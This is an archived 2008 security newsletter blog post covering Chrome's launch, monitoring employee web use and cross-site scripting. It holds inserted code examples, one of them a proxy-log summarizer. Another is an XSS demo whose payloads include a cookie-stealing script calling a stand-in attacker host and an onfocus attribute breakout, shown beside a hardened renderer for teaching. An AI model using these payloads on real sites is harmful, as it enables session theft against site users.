Published on Security Incite: Analysis on Information Security (http://securityincite.com)

The Daily Incite - September 4, 2008

By Mike Rothman
Created 2008-09-04 08:15
Today's Daily Incite

September 4, 2008 - Volume 3, #74

Good Morning:
After seeing so many live music shows this year, the sizzle is waning. Sure, it's great to see fantastic, charismatic singers. And folks that can make sounds come out of a guitar that boggle the mind. But while I was seeing My Morning Jacket last week or John Mayer over the weekend, I didn't focus on the guitarists (as good as they are). I wanted to pay attention a bit to the unsung heroes that make live music happen.
The anonymous bass player
That's right, let's hear it for the rhythm section - the bass guitarist and the drummer. With very rare exceptions you don't go see a band because you like the bass player or the drummer. Of course, you go to see Rush to remind yourself how great Neil Peart is. I think that Sting guy may be able to sing also. But beyond that, who is the drummer? Who is the bass player?

So at the last two shows I tried my best to pay more attention to the bass player and the drummer. They were good. MMJ's drummer had long hair that seemed to do more damage to the cymbals than his drum sticks. John Mayer's bass player kept the rhythm going, but now a few days after the show, I couldn't tell you what that guy looked like. I guess I'm like everyone else. It's the shiny objects that are memorable, not the rhythm section.

The guitarists get all the money and the chicks (or guys if they swing that way). So this weekend let's try not to forget these other folks, even if they are entirely forgettable. Go find a bass player or a drummer and thank them for the labor they provide during every live show. Tell them without their contributions, you'd only have half a band. Half a band sounds like crap. 

And then get back to staring at the guitarist. Man, those guys can play!

Have a great weekend. 

Photo: "bass player" originally uploaded by davidex [1]



Top Security News

Evidently the browser works OK [10], according to the folks that have played with it. Dennis Fisher figures it won't make a huge dent in market share beyond the digit heads [11], and Mitchell is bitching about having to Q/A another browser platform [12]. Do I think this is earth shattering? Nope. But it's clear that the underlying OS will just be a host for a variety of "application" platforms that are optimized for specific use cases. Chrome will be one, maybe Firefox another, and maybe you'll get developers extending Chrome to optimize it for their own environments. And it won't matter if you run Windows or Mac OS X or even Linux on your device. This will likely accelerate the marginalization of the OS, and that's a good thing. Amrit is on the right track [13] about this being a "platform" more than anything else. But let's not anoint Chrome as the best thing since sliced bread from a security standpoint until it's been proven. Google does beta stuff pretty well, but until I can get NoScript-type functionality (and a Mac version), I'll be waiting on the sidelines.

As Seltzer points out, it's not clear what the real impact will be for compliance purposes [15] and for monitoring employees' use of technology. But all is not lost, since we can still monitor the network. You also may want to (try to) enforce use of a VPN for remote employees, so their web traffic is routed through your network. Then you can monitor that too. That one's a bit harder, since a split-tunnel configuration or a user who simply disconnects the VPN sends web traffic around your network rather than through it, but it's possible. The action-reaction process continues unabated. At least you know these new actions are happening, so you can plan your reactions.
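To make the "we can still monitor the network" point concrete, here is an added example (mine, not code from the Security Incite post or from Seltzer's article) that summarizes browsing activity from a forward proxy's logs, which exist regardless of what the browser keeps on disk. It assumes a Squid-style access.log layout (timestamp, elapsed ms, client IP, result code, bytes, method, URL, proxy user or "-", peer, content type); the log lines, users and hosts below are constructed for illustration. Note the HTTPS caveat: for a CONNECT tunnel the proxy sees only host and port, never the path.

```python
"""Summarize per-user web activity from proxy logs (constructed sample data).

Added example, not from the Security Incite post. Assumes a Squid native
access.log: ts elapsed client result bytes method url user peer content-type.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in Squid native format (not real traffic).
SAMPLE_LOG = """\
1220515200.123    150 10.1.2.3 TCP_MISS/200 5123 GET http://www.example.com/news/ jsmith DIRECT/93.184.216.34 text/html
1220515201.456     20 10.1.2.3 TCP_MISS/200 812 CONNECT mail.example.net:443 jsmith DIRECT/203.0.113.5 -
1220515202.789    300 10.1.2.7 TCP_MISS/200 22045 GET http://www.example.org/jobs/listing?id=42 - DIRECT/203.0.113.9 text/html
1220515203.001     10 10.1.2.7 TCP_DENIED/403 0 GET http://filesharing.example/upload - NONE/- text/html
this line is garbage and should be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<result>\S+)\s+(?P<bytes>\d+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+"
    r"(?P<user>\S+)\s+(?P<peer>\S+)\s+(?P<ctype>\S+)$"
)


def parse_line(line):
    """Return a dict for one access.log line, or None if it is malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    if rec["method"] == "CONNECT":
        # TLS tunnel: the proxy logs only host:port, never the path.
        rec["host"] = rec["url"].rsplit(":", 1)[0]
    else:
        rec["host"] = urlsplit(rec["url"]).hostname or ""
    rec["denied"] = rec["result"].startswith("TCP_DENIED")
    return rec


def summarize(log_text):
    """Map each principal (proxy user, else client IP) to hosts and denials.

    Returns {principal: {"hosts": set_of_hosts, "denied": [urls]}}.
    Malformed lines are skipped rather than aborting the report.
    """
    summary = defaultdict(lambda: {"hosts": set(), "denied": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        who = rec["user"] if rec["user"] != "-" else rec["client"]
        summary[who]["hosts"].add(rec["host"])
        if rec["denied"]:
            summary[who]["denied"].append(rec["url"])
    return dict(summary)


if __name__ == "__main__":
    for who, info in summarize(SAMPLE_LOG).items():
        print(who, sorted(info["hosts"]), info["denied"])
```

Unauthenticated proxy sessions fall back to the client IP, which is only as good as your DHCP records; if you want names rather than addresses, require proxy authentication or join the VPN's assignment log to this output.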

NetworkWorld has a good article that provides some tips on dealing with it [17]. Basically, you can't freak out, and hopefully you've been making contingency plans all along. If you work for someone else, it's kind of silly to assume things won't change in the business and that you'll always be welcome. This isn't the 1950's, folks; there is no guaranteed lifetime employment and a cushy pension at the back end of 30 years of toil and trouble. If you are too "busy" to take some action and get out and network a bit, or even to develop a contingency plan, do a little visioning exercise with me. Picture yourself packing up boxes in your office. Then picture how you are going to pay the bills and keep your significant other in the lifestyle she/he has become accustomed to. Not a pretty picture, right? So make sure you are constantly thinking about what's next. Better to be safe than dealing with the repo man.


The Laundry List

  1. Secure Computing puts Securify out of their misery for $15 million and an earn out. VCs took a bath on this one, but that's life in the big city. And it goes to show even a cat only has 9 lives. - Secure Computing release [19]
  2. Novell introduces the most "advanced compliance management" solution, which evidently is a knife to kill the auditor in the parking lot. All kidding aside, what kind of differentiator is "advanced?" - Novell release [20]
  3. Sick of paying for AV? Build your own, just don't try to manage it for more than a desktop or two. - NetworkWorld [21]
  4. You think Ballmer will be master of his own domain? He's under a lot of stress, you know? Maybe Seinfeld will help them fend off the Mac Guy, but probably not. No Office for You! - Dvorak MarketWatch column [22]

Top Blog Postings

http://1raindrop.typepad.com/1_raindrop/2008/08/software-security-market.html [23]

Thanks to Dave Piscitello [25] for pointing me towards Russ McRee's excellent piece on cross-site scripting in the ISSA Journal. A key to being a good defender is to understand your adversaries, so being able to put yourself into the mind of the criminal is critical to being able to defend yourself. So what do you see here from an XSS attack standpoint? Basically it's something that can happen to anyone, and it's hard (as a user) to defend against. I know I pimp NoScript a lot, but it adds a bit of XSS defense to your Firefox browser as well. From a developer standpoint, there are a few tips at the end to keep in mind. Of course, it's unlikely you are the actual developer, so you'll need to evangelize these points to your developers at every turn: validate inputs, encode outputs for the context they land in, and look at both web app firewalls and code reviews. Russ forgot to tell you to keep fighting the good fight, because behaviors don't change overnight and building secure applications does require a behavioral change. Note the link below is a PDF file.
http://holisticinfosec.org/publications/anatomy_of_an_xss_attack.pdf [26]
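To show what "validate inputs, encode outputs" looks like in code, here is an added example of a reflected-XSS bug beside its hardened form. It is my illustration, not code from Russ McRee's article or from Security Incite; the page template, the field names (a search query and a username) and the attacker payloads are made up. It also includes a small parser-based checker that looks at the rendered HTML the way a browser would, so you can see that the hardened version yields no script tag and no event-handler attribute even for input that never uses angle brackets.

```python
"""Reflected XSS: a vulnerable page renderer beside its hardened form.

Added example for the XSS discussion above (not from the ISSA Journal
article). Field names, template and payloads are constructed.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed attacker input: a classic cookie-stealing probe, and a variant
# that breaks out of a quoted attribute without any angle brackets at all.
PAYLOAD_TAG = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'
PAYLOAD_ATTR = '" autofocus onfocus="alert(1)'

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def render_unsafe(query, username):
    """Vulnerable: user input is concatenated straight into the markup,
    in three different contexts (HTML body, attribute value, URL)."""
    return (
        '<p>Results for: ' + query + '</p>\n'
        '<input name="q" value="' + query + '">\n'
        '<a href="/profile?user=' + username + '">profile</a>'
    )


def is_valid_username(username):
    """Allowlist validation: only a tight character set, bounded length."""
    return bool(USERNAME_RE.match(username))


def validate_username(username):
    if not is_valid_username(username):
        raise ValueError("invalid username")
    return username


def render_safe(query, username):
    """Hardened: validate where a strict format exists, encode everywhere.

    html.escape(quote=True) turns < > & " ' into entities, which is correct
    for HTML body text and for double-quoted attribute values. A free-text
    search query cannot be allowlisted, so encoding is its only defence.
    quote() percent-encodes the value placed into a URL.
    """
    user = validate_username(username)
    q_html = html.escape(query, quote=True)
    return (
        '<p>Results for: ' + q_html + '</p>\n'
        '<input name="q" value="' + q_html + '">\n'
        '<a href="/profile?user=' + quote(user, safe="") + '">profile</a>'
    )


class ActiveContentFinder(HTMLParser):
    """Records <script> tags and on* event-handler attributes as a browser's
    parser would see them, wherever in the page they ended up."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(tag + "@" + name)


def find_active_content(page):
    """Return a list of script tags / event handlers found in rendered HTML."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for payload in (PAYLOAD_TAG, PAYLOAD_ATTR):
        print("unsafe:", find_active_content(render_unsafe(payload, "alice")))
        print("safe:  ", find_active_content(render_safe(payload, "alice")))
```

The second payload is the one worth remembering when someone argues that "we strip angle brackets": it never contains one, yet in the unsafe renderer it turns the input box into a self-firing `onfocus` handler. Context-correct output encoding, not character stripping, is what closes it; a web application firewall in front of this code would be a second layer, not a substitute.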

http://techbuddha.wordpress.com/2008/08/29/saas-and-cloud-computing-change-the-cia-paradigm/ [28]


Source URL:
http://securityincite.com/blog/mike-rothman/the-daily-incite-september-4-2008